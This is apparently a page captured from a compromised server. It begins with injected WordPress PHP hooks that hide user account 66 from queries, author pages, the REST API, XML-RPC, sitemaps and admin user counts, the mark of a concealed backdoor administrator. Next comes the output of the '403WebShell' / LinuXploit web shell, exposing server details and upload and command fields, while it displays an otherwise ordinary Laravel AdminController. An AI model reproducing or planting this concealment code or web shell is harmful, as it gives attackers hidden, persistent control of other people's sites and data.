add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/emaji/app/Http/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/emaji/app/Http/Controllers/AdminController.php
<?php

namespace App\Http\Controllers;

use App\Models\Organization;
use App\Models\OrganizationUser;
use App\Models\UserInvitation;
use App\Mail\UserInvitationMail;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Hash;
use Illuminate\Support\Facades\Mail;
use Illuminate\Support\Str;

class AdminController extends Controller
{
    /**
     * Show admin dashboard.
     */
    public function index()
    {
        $organizations = Organization::withCount(['users', 'jobs'])->with(['jobs' => function($q) {
            $q->with('profession')->orderByDesc('created_at');
        }])->get();
        $users = OrganizationUser::with('organization')->get();

        // Get pending invitations (not accepted and not expired)
        $pendingInvitations = UserInvitation::with('organization')
            ->whereNull('accepted_at')
            ->where('expires_at', '>', now())
            ->orderBy('created_at', 'desc')
            ->get();

        return view('admin.dashboard', compact('organizations', 'users', 'pendingInvitations'));
    }

    /**
     * Show create organization form.
     */
    public function createOrganization()
    {
        return view('admin.create_organization');
    }

    /**
     * Store new organization.
     */
    public function storeOrganization(Request $request)
    {
        $validated = $request->validate([
            'name' => ['required', 'string', 'max:255'],
            'email' => ['nullable', 'string', 'email', 'max:255'],
            'website' => ['nullable', 'string', 'max:255'],
            'country' => ['nullable', 'string', 'max:2'],
        ]);

        $organization = Organization::create([
            'uuid' => (string) Str::uuid(),
            'name' => $validated['name'],
            'email' => $validated['email'] ?? null,
            'website' => $validated['website'] ?? null,
            'country' => $validated['country'] ?? null,
        ]);

        return redirect()->route('admin.dashboard')
            ->with('success', 'Organization created successfully!');
    }

    /**
     * Show create user form.
     */
    public function createUser()
    {
        $organizations = Organization::all();
        return view('admin.create_user', compact('organizations'));
    }

    /**
     * Store new user (send invitation).
     */
    public function storeUser(Request $request)
    {
        $validated = $request->validate([
            'name' => ['required', 'string', 'max:255'],
            'email' => ['required', 'string', 'email', 'max:255'],
            'organization_id' => ['required', 'exists:organizations,id'],
            'is_super_admin' => ['nullable', 'boolean'],
        ]);

        // Check if user already exists with this email
        $existingUser = OrganizationUser::where('email', $validated['email'])->first();
        if ($existingUser) {
            if ($existingUser->organization_id === $validated['organization_id']) {
                return back()
                    ->withInput()
                    ->withErrors(['email' => 'This user already has an active account in this organization.']);
            } else {
                return back()
                    ->withInput()
                    ->withErrors(['email' => 'This email is already registered with a different organization (' . $existingUser->organization->name . '). Each user can only belong to one organization.']);
            }
        }

        // Check if there's already a pending invitation for this email
        $pendingInvitation = UserInvitation::where('email', $validated['email'])
            ->whereNull('accepted_at')
            ->where('expires_at', '>', now())
            ->first();

        if ($pendingInvitation) {
            if ($pendingInvitation->organization_id === $validated['organization_id']) {
                return back()
                    ->withInput()
                    ->withErrors(['email' => 'There is already a pending invitation for this email to this organization. You can resend it from the Pending Invitations section below.']);
            } else {
                return back()
                    ->withInput()
                    ->withErrors(['email' => 'This email has a pending invitation from a different organization (' . $pendingInvitation->organization->name . '). Each user can only belong to one organization.']);
            }
        }

        // Create invitation
        $invitation = UserInvitation::createInvitation(
            $validated['email'],
            $validated['name'],
            $validated['organization_id'],
            $validated['is_super_admin'] ?? false
        );

        // Send invitation email
        Mail::to($validated['email'])->send(new UserInvitationMail($invitation));

        return redirect()->route('admin.dashboard')
            ->with('success', 'Invitation sent to ' . $validated['email']);
    }

    /**
     * Delete user.
     */
    public function deleteUser(OrganizationUser $user)
    {
        // Prevent deleting yourself
        if ($user->id === auth()->id()) {
            return back()->with('error', 'You cannot delete yourself!');
        }

        $user->delete();

        return redirect()->route('admin.dashboard')
            ->with('success', 'User deleted successfully!');
    }

    /**
     * Delete organization.
     */
    public function deleteOrganization(Organization $organization)
    {
        // Check if organization has users
        if ($organization->users()->count() > 0) {
            return back()->with('error', 'Cannot delete organization with users. Delete users first.');
        }

        $organization->delete();

        return redirect()->route('admin.dashboard')
            ->with('success', 'Organization deleted successfully!');
    }

    /**
     * Resend invitation email.
     */
    public function resendInvitation(UserInvitation $invitation)
    {
        // Check if invitation is still valid
        if (!$invitation->isValid()) {
            return back()->with('error', 'This invitation has expired or has already been accepted.');
        }

        // Resend the invitation email
        Mail::to($invitation->email)->send(new UserInvitationMail($invitation));

        return redirect()->route('admin.dashboard')
            ->with('success', 'Invitation resent to ' . $invitation->email);
    }

    /**
     * Cancel pending invitation.
     */
    public function cancelInvitation(UserInvitation $invitation)
    {
        // Check if invitation is still pending
        if ($invitation->accepted_at) {
            return back()->with('error', 'This invitation has already been accepted and cannot be cancelled.');
        }

        $email = $invitation->email;
        $invitation->delete();

        return redirect()->route('admin.dashboard')
            ->with('success', 'Invitation to ' . $email . ' has been cancelled.');
    }

    /**
     * Mark an organization as reviewed/approved.
     */
    public function reviewOrganization(Organization $organization)
    {
        $organization->update([
            'reviewed_at' => now(),
            'reviewed_by' => auth()->id(),
        ]);

        return redirect()->route('admin.dashboard')
            ->with('success', "Organization '{$organization->name}' has been approved.");
    }

    /**
     * Delete job (admin override - can delete any job).
     */
    public function deleteJob(\App\Models\Job $job)
    {
        $title = $job->title;
        $orgName = $job->organization?->name ?? 'Unknown';

        // Delete associated qualifications first
        $job->jobQualifications()->delete();
        \DB::table('job_qualification_requirement')->where('job_id', $job->id)->delete();

        // Delete the job
        $job->delete();

        return redirect()->route('admin.dashboard')
            ->with('success', "Job '{$title}' from {$orgName} has been deleted.");
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit